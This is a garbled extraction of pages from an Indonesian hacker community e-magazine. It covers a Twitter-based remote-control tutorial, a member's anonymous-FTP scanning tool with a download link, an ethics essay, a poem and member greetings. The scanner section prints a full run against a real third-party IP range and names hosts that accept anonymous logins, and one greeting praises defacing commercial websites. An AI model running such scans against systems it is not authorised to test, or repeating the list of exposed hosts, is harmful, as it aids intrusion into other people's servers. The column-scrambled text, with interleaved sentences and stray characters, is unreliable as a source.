mb r f sbo e Dn2 n l a
y t n o
D / / z K B &
kag a a
j k uatargoai t
p a
g n u
k a
g /
: /
: k
u s n u l i g o i o k p p n - - -
tuaaYbl t p
GhChSoLl r n g r n m n t t a
n
Up( e n
u - - - - & c
S i
t o
l e
B a
D e
D i
L t
h t
h h
T
“Independence C0DES, DC Backs to Holy”

Remote Computer Lewat


Twitter
Oleh: Selfdefense

Assalamualaikum. Wr. Wb

Saya nubie cuman mau share nih cara ane


memonitor dab ngotrol komputer ane klo
lgi di penjim ama temen bwt
internetan... ato lgi ngerjain tugas
trus nyambung ke internet dari jarak
jauh pastinya....

1. trus kli Sign With Twitter dan


pada initinya ni software buat ngeremot langsung login...
ama memonitor PC ato Laptop kita dari
jarak jauh dengan menggunakan media
Twitter dan klo ane sih lebih suka
ngeremote komputernya dari handphone
lewat Mobile Twitter

biar lebih gaya gitu...

okey Kembali ke tengtop... kita langsung


aja ke bahan2 dan dan cara
pembuatannya...

1. Koneksi Internet (pastinya)


2. Akun Twitter (saran ane sih bikin
akun lgi bwt ngeremotnya)
3. Program TweetMyPC 2. Tungguin sampe nomer togel-nya
4. Hengpon (jika perlu) keluar...

Cara Pembuatanya

1. Buat Akun twitter baru... (gw yakin


tmen2 smua udah bsa yg gni mah)....

2. Donglot dan Instoll program


TweetMyPC-nya...

Required: * Windows Installer 3.1


* .NET Framework 3.5 SP1

3. masukin setinggan sesuai yg tadi di


daftari

Devilc0de INDONESIA “To Unite and Develop” 56


“Independence C0DES, DC Backs to Holy”

6.masukin kdalem Kolomnya trus Klik save ngetik commandnya dari hengpon
setting ane...

woookkeeyyy... selesai juga...


smoga membantu buat temen2
smua... ane jga msh nubi yg

selamat berkreasi dengan


Command2-nya dan bisa juga bikin
custom command yang bisa kita
1. tinggal di pake deh programnya operasiin buat ngejalanin
trus buka web browser.. program2 yg sdikit nakal...

Kunmpulan Commandnya: *Tolong doakan kuliah saya lancar


ya....
http://tweetmypc.codeplex.com/wik
ipage?title=Commands

Nahhh ini hasil screenshoot ane...

Devilc0de INDONESIA “To Unite and Develop” 57


“Independence C0DES, DC Backs to Holy”

Nama Tools: WTC Anonymous FTP Pentest


Author: White_Heaven_Angels

--------------------------------------------------------

Fungsi

melakukan pendeteksian server yang menggunakan technology FTP kemudian mencoba


melakukan login secara otomatis menggunakan user "anonymous".

Manfaat

dengan menggunakan tools membantu para system administrator, dan web developer untuk
mengecek apakah user default "anonymous" masih dapat login terhadap server FTP yang
sudah terinstall FTP dalam server UNIX, LINUX, dan Windowsnya

Cara Menggunakan

whitecyber@whitecyber-server:~/Desktop/whitecyberc0de/scanners$
./wtcanonymousftppentest.py

Cara Menggunakan: ./wtcanonymousftppentest.py <ip range>

Contoh Penggunaan

whitecyber@whitecyber-server:~/Desktop/whitecyberc0de/scanners$
./wtcanonymousftppentest.py 173.236.56.106-200

[ Scanning 173.236.56.106-200 ]

Ditemukan 40 host dengan FTP terbuka .

Melakukan cek menggunakan anonymous login untuk masuk 173.236.56.106


An error occurred: 530 Login authentication failed
Melakukan cek menggunakan anonymous login untuk masuk 173.236.56.107
An error occurred: 530 Login authentication failed
Melakukan cek menggunakan anonymous login untuk masuk 173.236.56.108
An error occurred: 530 Login authentication failed
Melakukan cek menggunakan anonymous login untuk masuk 173.236.56.109
An error occurred: 530 Login authentication failed
Melakukan cek menggunakan anonymous login untuk masuk 173.236.56.110
An error occurred: 530 Login authentication failed
Melakukan cek menggunakan anonymous login untuk masuk 173.236.56.122
drwxr-xr-x 3 1294 1283 4096 May 7 2010 .
drwxr-xr-x 3 1294 1283 4096 May 7 2010 ..
drwxr-xr-x 2 1294 1283 4096 May 7 2010 incoming

Anonymous login sukses masuk pada 173.236.56.122

Melakukan cek menggunakan anonymous login untuk masuk 173.236.56.123


drwxr-xr-x 3 1333 1322 4096 May 9 2010 .
drwxr-xr-x 3 1333 1322 4096 May 9 2010 ..
-rw------- 1 65535 50 4 Aug 16 01:14 .ftpquota
drwxr-xr-x 2 1333 1322 4096 May 8 2010 incoming

Devilc0de INDONESIA “To Unite and Develop” 58


“Independence C0DES, DC Backs to Holy”

Anonymous login sukses masuk pada 173.236.56.123

Melakukan cek menggunakan anonymous login untuk masuk 173.236.56.124


An error occurred: 421 Can't change directory to /var/ftp/ [/]
Melakukan cek menggunakan anonymous login untuk masuk 173.236.56.125
An error occurred: 421 Can't change directory to /var/ftp/ [/]
Melakukan cek menggunakan anonymous login untuk masuk 173.236.56.126
drwxr-xr-x 3 1423 1412 4096 May 14 2010 .
drwxr-xr-x 3 1423 1412 4096 May 14 2010 ..
-rw------- 1 65535 50 4 Aug 19 00:58 .ftpquota
drwxr-xr-x 2 1423 1412 4096 May 8 2010 incoming

Anonymous login sukses masuk pada 173.236.56.126

Melakukan cek menggunakan anonymous login untuk masuk 173.236.56.130

Anonymous login sukses masuk pada 173.236.56.130

Melakukan cek menggunakan anonymous login untuk masuk 173.236.56.131


An error occurred: 421 Can't change directory to /var/ftp/ [/]
Melakukan cek menggunakan anonymous login untuk masuk 173.236.56.132
An error occurred: 421 Can't change directory to /var/ftp/ [/]
Melakukan cek menggunakan anonymous login untuk masuk 173.236.56.133
An error occurred: 421 Can't change directory to /var/ftp/ [/]
Melakukan cek menggunakan anonymous login untuk masuk 173.236.56.134
An error occurred: 421 Can't change directory to /var/ftp/ [/]
Melakukan cek menggunakan anonymous login untuk masuk 173.236.56.146
^[[A^[[A^[[A^[[AAn error occurred: 530 Login authentication failed
Melakukan cek menggunakan anonymous login untuk masuk 173.236.56.147
^[[B^[[B^[[B^[[B^[[B^[[B^[[B^[[B^[[A^[[A^[[A^[[AAn error occurred: 530 Login
authentication failed
Melakukan cek menggunakan anonymous login untuk masuk 173.236.56.148
An error occurred: 530 Login authentication failed
Melakukan cek menggunakan anonymous login untuk masuk 173.236.56.149
An error occurred: 530 Login authentication failed
Melakukan cek menggunakan anonymous login untuk masuk 173.236.56.150
An error occurred: 530 Login authentication failed
Melakukan cek menggunakan anonymous login untuk masuk 173.236.56.162
An error occurred: 421 Can't change directory to /var/ftp/ [/]
Melakukan cek menggunakan anonymous login untuk masuk 173.236.56.163
drwxr-xr-x 3 503 500 4096 Jul 29 2010 .
drwxr-xr-x 3 503 500 4096 Jul 29 2010 ..
-rw------- 1 65535 50 4 Jul 31 00:59 .ftpquota

drwxr-xr-x 2 503 500 4096 Feb 11 2010 incoming

Anonymous login sukses masuk pada 173.236.56.163

Melakukan cek menggunakan anonymous login untuk masuk 173.236.56.164


drwxr-xr-x 3 578 574 4096 Aug 4 2010 .
drwxr-xr-x 3 578 574 4096 Aug 4 2010 ..
drwxr-xr-x 2 578 574 4096 Aug 4 2010 incoming

Anonymous login sukses masuk pada 173.236.56.164

Melakukan cek menggunakan anonymous login untuk masuk 173.236.56.165


An error occurred: 421 Can't change directory to /var/ftp/ [/]
Melakukan cek menggunakan anonymous login untuk masuk 173.236.56.166

Anonymous login sukses masuk pada 173.236.56.166

Devilc0de INDONESIA “To Unite and Develop” 59


“Independence C0DES, DC Backs to Holy”

Melakukan cek menggunakan anonymous login untuk masuk 173.236.56.170


An error occurred: 530-Unable to set anonymous privileges.
530 Login incorrect.

Melakukan cek menggunakan anonymous login untuk masuk 173.236.56.171


-rw-rw-r-- 1 ftpuser ftpgroup 383 Jun 5 2009 budgetvalet.html
drwxr-xr-x 2 ftpuser ftpgroup 4096 Nov 21 2008 incoming

Anonymous login sukses masuk pada 173.236.56.171

Melakukan cek menggunakan anonymous login untuk masuk 173.236.56.172


An error occurred: 530-Unable to set anonymous privileges.
530 Login incorrect.
Melakukan cek menggunakan anonymous login untuk masuk 173.236.56.173
drwxr-xr-x 2 ftpuser ftpgroup 4096 Jun 16 19:34 incoming

Anonymous login sukses masuk pada 173.236.56.173

Melakukan cek menggunakan anonymous login untuk masuk 173.236.56.174


An error occurred: 530-Unable to set anonymous privileges.
530 Login incorrect.
Melakukan cek menggunakan anonymous login untuk masuk 173.236.56.186
An error occurred: 421 Can't change directory to /var/ftp/ [/]
Melakukan cek menggunakan anonymous login untuk masuk 173.236.56.187
drwxr-xr-x 5 543 540 4096 Aug 24 2010 .
drwxr-xr-x 5 543 540 4096 Aug 24 2010 ..
-rw------- 1 65535 50 4 Aug 26 03:31 .ftpquota
drwxr-xr-x 2 543 540 4096 Dec 16 2009 conf
drwxr-xr-x 3 543 540 4096 Dec 16 2009 incoming
drwxr-xr-x 2 543 540 4096 Dec 16 2009 pub

Anonymous login sukses masuk pada 173.236.56.187

Melakukan cek menggunakan anonymous login untuk masuk 173.236.56.188


drwxr-xr-x 5 525 522 4096 Feb 10 2011 .
drwxr-xr-x 5 525 522 4096 Feb 10 2011 ..
-rw------- 1 65535 50 4 Aug 12 03:30 .ftpquota
drwxr-xr-x 2 525 522 4096 Mar 9 2010 conf
drwxr-xr-x 3 525 522 4096 Mar 9 2010 incoming
drwxr-xr-x 2 525 522 4096 Mar 9 2010 pub

Anonymous login sukses masuk pada 173.236.56.188

Melakukan cek menggunakan anonymous login untuk masuk 173.236.56.189


drwxr-xr-x 3 503 500 4096 Feb 10 2011 .
drwxr-xr-x 3 503 500 4096 Feb 10 2011 ..
-rw------- 1 65535 50 4 Aug 12 03:30 .ftpquota
drwxr-xr-x 2 503 500 4096 May 22 2010 incoming

Anonymous login sukses masuk pada 173.236.56.189

Melakukan cek menggunakan anonymous login untuk masuk 173.236.56.190


drwxr-xr-x 3 517 514 4096 Feb 10 2011 .
drwxr-xr-x 3 517 514 4096 Feb 10 2011 ..
-rw------- 1 65535 50 4 Aug 12 03:31 .ftpquota
drwxr-xr-x 2 517 514 4096 Jun 16 2010 incoming

Anonymous login sukses masuk pada 173.236.56.190

Devilc0de INDONESIA “To Unite and Develop” 60


“Independence C0DES, DC Backs to Holy”

Melakukan cek menggunakan anonymous login untuk masuk 173.236.56.194


An error occurred: 421 Can't change directory to /var/ftp/ [/]
Melakukan cek menggunakan anonymous login untuk masuk 173.236.56.195
An error occurred: 421 Can't change directory to /var/ftp/ [/]
Melakukan cek menggunakan anonymous login untuk masuk 173.236.56.196
An error occurred: 421 Can't change directory to /var/ftp/ [/]
Melakukan cek menggunakan anonymous login untuk masuk 173.236.56.197
An error occurred: 421 Can't change directory to /var/ftp/ [/]
Melakukan cek menggunakan anonymous login untuk masuk 173.236.56.198
An error occurred: 421 Can't change directory to /var/ftp/ [/]

Hasil

Rupanya jaringan yang kita scan masih menggunakan user default "anonymous" sehingga
dapat dimasuki.

Melakukan cek menggunakan anonymous login untuk masuk 173.236.56.163


drwxr-xr-x 3 503 500 4096 Jul 29 2010 .
drwxr-xr-x 3 503 500 4096 Jul 29 2010 ..
-rw------- 1 65535 50 4 Jul 31 00:59 .ftpquota
drwxr-xr-x 2 503 500 4096 Feb 11 2010 incoming

Anonymous login sukses masuk pada 173.236.56.163


Melakukan cek menggunakan anonymous login untuk masuk 173.236.56.164
drwxr-xr-x 3 578 574 4096 Aug 4 2010 .
drwxr-xr-x 3 578 574 4096 Aug 4 2010 ..
drwxr-xr-x 2 578 574 4096 Aug 4 2010 incoming

Anonymous login sukses masuk pada 173.236.56.164

Kita coba menggunakan filezilla untuk masuk menggunakan user "anonymous" password
(diisi apa saja. hasilnya adalah seperti ini

Semoga dengan ini administrator dapat merubah user default untuk dirubah menjadi
lebih aman.

Download

http://www.ziddu.com/download/16193541/wtcanonymousftppentest.py.zip.html

Devilc0de INDONESIA “To Unite and Develop” 61


“Independence C0DES, DC Backs to Holy”

beberapa kerutan karena usianya yang


Casper Spy dan Hacker
menua, ‘wajar lah sudah elite’ bisik Casper
Elite ‘Tante Caroline’ dalam hati.

Oleh: Casper_SPY Karena sudah beberapa kali muncul ke dunia


nyata, tidak sulit juga untuk Casper kali ini
masuk ke dunia tante Caroline yang
“Kunci sukses hacker elite kebetulan sedang tidak berhadapan dengan
komputernya kala itu.
adalah ketika masih newbie
belajar masterin sistem UNIX
dan TCP/IP, kalian akan jadi Berikut Curhat Tante Caroline:
seperti “a fish swimming in the Untuk menjadi seorang hacker sejati tidak
see of cyberspace; an Hanya dibutuhkan skill dan kemauan untuk
uberhacker among hacker belajar. Seorang calon hacker sejati harus
memiliki kebijaksanaan dan mampu menguasai
wannabe and a master of the
hasratnya yang kadang ingin ‘merusak’ bukan
internet universe.” ‘memperbaiki.’

Aku sebenarnya kecewa dengan dunia


hacking computer hari ini, sebuah pergeseran
paradigma, cara pandang, bahkan cara
Sekali si Casper Spy ketemu hacker cewek
belajar.
ketagihan pengen lagi ketemu sama hacker
cewek. Klo cowok terus, bosen katanya udah Ya walalupun ada semacam kemajuan karena
banyak. mereka yang newbie dapat dibiarkan
mengeskplorasi kemampuannya sendiri namun
Dalam beberapa tutorial hacking
sayangnya mereka yang muncul adalah
computerku, ada salah satu buku panduan
defacer-defacer ‘norak’ yang kadang cuma
yang download secara Cuma-Cuma ditulis
sibuk bahas bagaimana cara mencuri
seorang hacker wanita tante ‘Caroline.’
password dan mengganti foto profile dari
Latarbelakang beliau adalah programmer,
salah satu pemilik facebook yang mereka
yang banyak menulis turorial hacking
benci atau justru mereka taksir.
computer khusus untuk para newbie.
Ketika aku baru belajar hacking dulu, yang
Karena sudah pengalaman nge-ngespy di
kulakukan adalah menguji keamanan satu
dunia maya, gak sulit untuk Casper nemuin
web korban, kutinggalkan pesan bagaimana
Tante Caroline dari keluar masuk system di
mempatching kelemahan-kelemahan dari
dunia maya, alhasil nyampelah dia di negeri
sistemnya.
Paman Sam. Tante Caroline yang juga istri
dari hacker hebat itu kebetulan lagi sibuk Aku tidak pernah menuliskan “hacked by me”
nyiapin sarapan untuk keluarganya, wajahnya atau “owned by me” tidak ada untungnya
cantik namun sudah tampak muncul untuku, menjadi Hacker bukan untuk

Devilc0de INDONESIA “To Unite and Develop” 62


“Independence C0DES, DC Backs to Holy”

menjadi dikenal, melainkan untuk menjadi Menciptakan manuver-manuver


berguna dalam mengimprovisasi sistem berupa inovasi hacking n
sehingga aku bisa memberi solusi untuk mengimprovisasi kemampuan system
permasalahan computer security.
computer serta memberikan satu
Ketika aku mulai belajar menulis shellcode solusi untuk computer security dan
dulu, menciptakan satu attacker tool, yang jaringan, tentu saja menciptakan
kuinginkan adalah aku dapat menguji tool-tool yang dapat berguna dalam
kemampuan dan kelemahan backdoor pembelajaran hacking computer,
buatanku. Dari sana aku semakin tertantang khususnya untuk para newbie yang
untuk mengcreate scanner sehingga dalam selalu bersemangat untuk belajar
hacking computer ada proses yang disebut
dan mengeksplorasi, dan tentu saja
dengan inovasi hacking.
menciptakan software yang dapat
Aku tidak mengirim SPAM yang hanya akan dibebaskan untuk seluruh pengguna
membuat ribuan orang mengutuk kemampuan technology computer.
hacking computerku dan darinya Tuhan pun
mengutuk tingkat kepandaianku, skill ku
tidak akan bertambah sementara Darinya Hacking Computer dapat
pengetahuanku stuck di aksi-aksi yang berguna Merubah Dunia!!!
sifatnya sederhana.

Setiap hari aku mentargetkan untuk


Hacker gak bahas soal siapa
membuat satu tutorial yang nantinya akan
yang buron pasca hacking!!
berguna memperkenalkan satu teknik baru
dalam hacking. Setiap harinya aku
Yang hacker bahas soal POC,
mentargetkan mempatch satu website target bug, nge-root sampe share
yang kupilih secara acak, setiap harinya aku tricks dan bahas exploit
mengirim email kepada sysadmint demi secara detail.
memberikan informasi tentang kelemahan
securitynya, aku tidak peduli dibalas atau Yang hacker bahas soal
tidak. ngambil ilmu dari Mitnick,
Lee, Morris, Tovarlds,
Aku terlalu penasaran untuk tidak menguji belajar Faith dari Lamo,
semua operating system, karenanya berjiwa muda seperti
komputerku selalu mengalami sakit kepala Poulsen, Idealis seperti
setiap kali aku menginstal satu OS baru. Tapi RMS dan Assange, atau
ini bukan masalah karena eksplorasi adalah Berbudi dan Berkontribusi
sama bangsa seperti Pak
“trial dan error” yang tak terbatas dan selalu
Onno.
menyenangkan.
(Whitecoin)
Bantuklah dunia hacking computer hari ini
menjadi:

Devilc0de INDONESIA “To Unite and Develop” 63


“Independence C0DES, DC Backs to Holy”

Tahukan Engkau Wahai Hacker!!!! ‘Devilzc0des’


Aku nyaris menghabiskan seharian hanya untuk
Tahukah engkau, apa yang sudah kau tebarkan?
menterjemahkan arti dibalik kode-kodenya.
…..partikel-pertikel sayang yang menyusupi Otakku panas terbakar ketika airmata dan
setiap sudut dihatiku
peluh ku berpacu dengan gerakan jemari
mengebiri lembar demi lembar halaman dari
Tahukah engkau, apa yang sudah kau tanamkan? tutorial programming dihadapanku.

…..shell yang telah mengakar-mengeksekusi


seluruh bagian diragaku Ini gila aku mulai sinting, caciku pada diri
sendiri. Aku tidak sedemikian bodohnya
sehingga waktu lima jam menjadi limapuluh
Tahukah engkau, apa yang sudah kau tinggalkan?
jam, protesku berteriak sementara suaraku
…..virus yang kini menyelinapi aliran darah mulai diredam gejolak kemarahan yang
di sekujur tubuhku
mengutuk jiwa nan labil dan terperdaya.

Tahukah engkau, apa yang sudah kau hasilkan? Aku sadar apa yang terjadi adalah
ketertindasan, aku terjerambab dalam ruang
…..kode-kode baru yang telah merubah
susunan jiwaku bisu terkepung rasa bersalah, feeling ku menjadi
tumpul sementara instingku melebur menjadi
serpihan-serpihan debu, tertiup angin, hilang
Tahukan engkau apa yang sudah kau perintahkan? terhisap udara. Kutemukan nalarku melepuh
….Logcleaner fikiranku, hapus masalaluku, karena setiap makna yang kutemukan
kini engkau dalam perhatianku. membakar seisi kepala, hampir
membumihanguskannya. Jika kebodohanku itu

Tahukah engkau, apa yang sudah kau ciptakan?


berhasil melahapku, lenyaplah eksistensiku saat
itu juga.
…..Dunia baru dimana diriku terbakar
karena kekagumanku padamu
Devilzc0de….kode-kode mu sungguh
memperdayaiku
Dan tahukan engkau apa yang sudah terjadi?

…..Kau miliki hatiku karena Syair ini kupersembahkan untuk Devilzc0de


kecerdasanmu, kau buatku cinta padaMU INDONESIA

Wahai sang Hacker, si Cerdas nan mempesona


From Istanbul With Love….
--Bunga Mataharry--

Devilc0de INDONESIA “To Unite and Develop” 64


Devilz NOTES
“Independence C0DES, DC Backs to Holy”

Devilz REGARDS

Devilz Regards adalah bonus rubrik yang kami


ujikan dalam spesial edition ini diamana member
dipersilahkan untuk menyampaikan pesan-pesan
mereka terkait tema yang Devilz usung.

Melalui bonus rubrik ini kami berharap


dapat lebih menstimulus kawan-kawan
komunitas untuk menjalin komunikasi
antar sesame.

Devilz From : E-MAGAZINE TEAM Devilz From : The_Legend


Devilz To : Pemred Seniman Maya
Impressi Maha Metal Devilz To : Mutiara

Devilz Regards : “Makasih om atas kerja Devilz Regards : “Ane terlalu sangat ganteng
kerasnya kalau bukan karena ente gak bakal dan hacker keren neng, gimana kalau abis lebaran
terealisasi ini e-magazine edisi transisi apalagi ane exploit hati neng aja, soalnya ane abis diputusin
si layouternya kelamaan liburan summer”… :D
pacar ane gara-gara kebanyakan hacking computer.

Devilz From : Nofia Fitri


Devilz From : Whitecoin
Devilz To : Hacker Muda GARUDA
Devilz To : H-Mei7
Devilz Regards :“Saatnya Hacker Muda
Merubah Dunia, Karena di Dada Kita ada Devilz Regards : “Om boleh kenalan dong, pengen
Garuda, Save the world, Hack the Planet, Free belajar gaya defacement om yang keren, ane mau ganti laman
the Universe!!!!” website komersil dengan seruan moral dan kemanusiaan.”

Devilz From :Dealova Devilz From : legion.dome


Devilz To :Revres Tanur
Devilz To : Ujang.cakep
Devilz Regards :“Kakak hacker revtan,
Dea kangen deh, kapan nih belajar lagi, Devilz Regards : Payah nih, DC gak jadi di
kan udah HUT RI ke-66, ayo kita ciptakan
manuver hacking terbaru untuk merubah Deface, padahal kan keren klo pas lebaran dpt
Indonesia. Parcel dari hacker :D

Devilz From : Katak Devilz From : Schumbag

Devilz To : Casper_Spy Devilz To : Peri Cantik


Devilz Regards : “Casper yang suka ngespy
Devilz Regards : Kalau udah smpe Jakarta
maya, selamat lebaran, tolong berhenti memata-
matai dunia maya, kamu sudah mengancam mata Jangan lupa kabarin kawan2 DC ya, supaya kita
pencarian om-om carder :kesel. ” Merubah DUNIA bersama.

Devilc0de INDONESIA “To Unite and Develop” 65


Devilz INFO
“Independence C0DES, DC Backs to Holy”

Announcement

Keterangan: Trims utk Kakanda Harry Sufehmi, om


Cyberheb, El Arya dan Mywisdom atas
Dear kawan-kawan Hacker Muda Tanah Air… kontribusi awalnya di Project penulisan
ini. Untuk Abah Abimanyu yang selalu
Screenshoot diatas adalah komunikasiku menerangi belajar dan usahaku dari
dengan phrack.org. Seperti yang kalian advicesnya serta Pak Onno yang selalu
dapat lihat, phrack.org meminta secara menginspirasi dari kebaikan hati dan
langsung artikel mengenai ‘Dunia Hacking kemampuan hacking computernya. Semoga
Indonesia’. Allah memberi kemuliaan untuk kalian
pada Perubah Dunia.
Untuk kalian yang berminat menjadi Tim
Penulis, silahkan email aku.

Mari mengangkat nama Hacking INDONESIA


ke MATA DUNIA.
Salam Hangat,
Terima Kasih.
Nofia Fitri

Devilc0de INDONESIA “To Unite and Develop” 66


Devilz INFO
“Independence C0DES, DC Backs to Holy”

Launching “Devilz” Devilz T-Shirt


(Devilzc0de Electronic Magazine)
Bagi members dan readers yang ingin memperoleh
Edisi Sumpah Pemuda dan Hari Pahlawan Devilzc0de T-Shirt berikut keterangannya:
(Release November 2011)

Kami informasikan bahwa edisi #4


Devilzc0de E-Magazine sudah akan
berbentuk Majalah “Devilz”. Dibawah ini
adalah logo Majalah Devilz yang DeMT
ajukan.

Devilz

Tidak tertutup kemungkinan bagi member


yang memiliki ide untuk mengajukan
design logonya.

Sementara tutorial dan artikel yang akan


muncul dalam edisi Launcing “Devilz”.
sebagai berikut:

1. Eve_001 (EXPLOIT for Beginner,


part 1 and 2)
2. Whitecoin (The Secrets of Corel
Draw for Design and Publishing)
Keterangan:
3. Devilzc0de untuk INDONESIA (DC
History Full Version)
4. Ditatompel (Video Instalasi Warna : Hitam
Nginx latest stable version Bahan : Cotton Combad 24's
dari sourcecode dan spawn-fcgi) Sablon : GL

DeMT menerima segala bentuk tutorial dan Produksi by Moruka


artikel khususnya yang terkait dengan
tema Sumpah Pemuda dan Hari Pahlawan Ukuran yang tersedia : S, M, L, XL, XXL,
2011, bagaimana technology computer XXXL
dapat bersinergy dengannya. Silahkan
email ke devil_ezine (at) yahoo (dot)co
(dot) id.
Dari Redaksi:
Untuk Tutorial atau artikel terpilih
oleh DeMT(belum pernah dipublikasi, Berhubung order kaos DC dihandle dan di Schedule
ditentukan berdasarkan kualitas dan
penyajian) disetiap terbitnya “Devilz” tante Viska, silahkan kunjungi DC forum utk
disediakan voucher pulsa dan Buku keterangan lebih lanjut.
Hacking, Programming, Security, etc.

Devilc0de INDONESIA “To Unite and Develop” 67


Penutup Redaksi
“Independence C0DES, DC Backs to Holy”

Salam Devilz.. Petarung Petarung MAYA “DeMT”

Kami mengapresiasi kerja Devilz E-Magazine TEAM Pemred Seniman Maya Impressi Maha Metal
(DeMT), para petarung maya atas released nya edisi “Schumbag”
(Sang Hacker Stock Ganteng Terakhir :P)
transisi ini.

Untuk Pemimpin Redaksi (Pemred) kami Seniman


Maya Impressi Maha Metal yang super hebat dan
whitecoin yang gak ada abis ini layouter energinya
ngedesign Devilz E-Magazine jadi ramai sebagaimana
semangat lebaran dan hari kemerdekaan.

Codes: “Spirit Sql Huba.. Huba..”


“Kalau biasanya DC pake design garang kali ini
ane bikin unyu unyu, edisi selanjutnya ane buat
lebih cadas, menyesuaikan mood ke pacar ane Designer-Layouter Super Tiada Tara
nih.” (Whitecoin). “Whitecoin”
(Guitarist Cool Sang Exploiter :D)
Terkait dengan setting Codes di setiap tutorial, maka
untuk memastikan, readers dipersilahkan mengunjungi
versi online di thread DC atau Blog Devilz Magazine.

Karena Ezine kali ini adalah edisi khusus yang juga


percobaan Ezine menuju E-Magazine, DeMT sangat
mengharapkan saran/masukan serta kritik dari seluruh
member Devilzcode dan Devilz Readers.
Codes: “Kunci G Sang Hacker”
Terakhir kami mengucapkan terimakasih kepada
semua member DC yang karya-karyanya digunakan
Redaktur Paling Tampan Se-Jagad Raya
dalam design E-Magazine ini tanpa konfirmasi lebih “Qrembiezs”
lanjut. (Manusia Unix Sang Pecinta Kode )

Segala bentuk pertanyaan silahkan ditujukan kepada


DeMT baik melalui email Ezine atau pm kepada yang
bersangkutan.

Salam Devilz untuk Pencerdasan dan


Pembebasan Informasi Codes: “no comment for now”

DEVİLZ E-MAGAZINE TEAM (DeMT)


*Mohon maaf kalau kami yang ter-CADAS di DC :P
Qrambiezs, Whitecoin, Schumbag

Devilc0de INDONESIA “To Unite and Develop” 68


“Independence C0DES, DC Backs to Holy”

Devilzc0de
(We Are Coder, We Are an EXPLOIT)

INDONESIA

To Unite and Develop o7….


-DeMT-

Devilzc0de untuk INDONESIA

Devilc0de INDONESIA “To Unite and Develop” 69


“Independence C0DES, DC Backs to Holy”

Devilc0de INDONESIA “To Unite and Develop” 70

Anda mungkin juga menyukai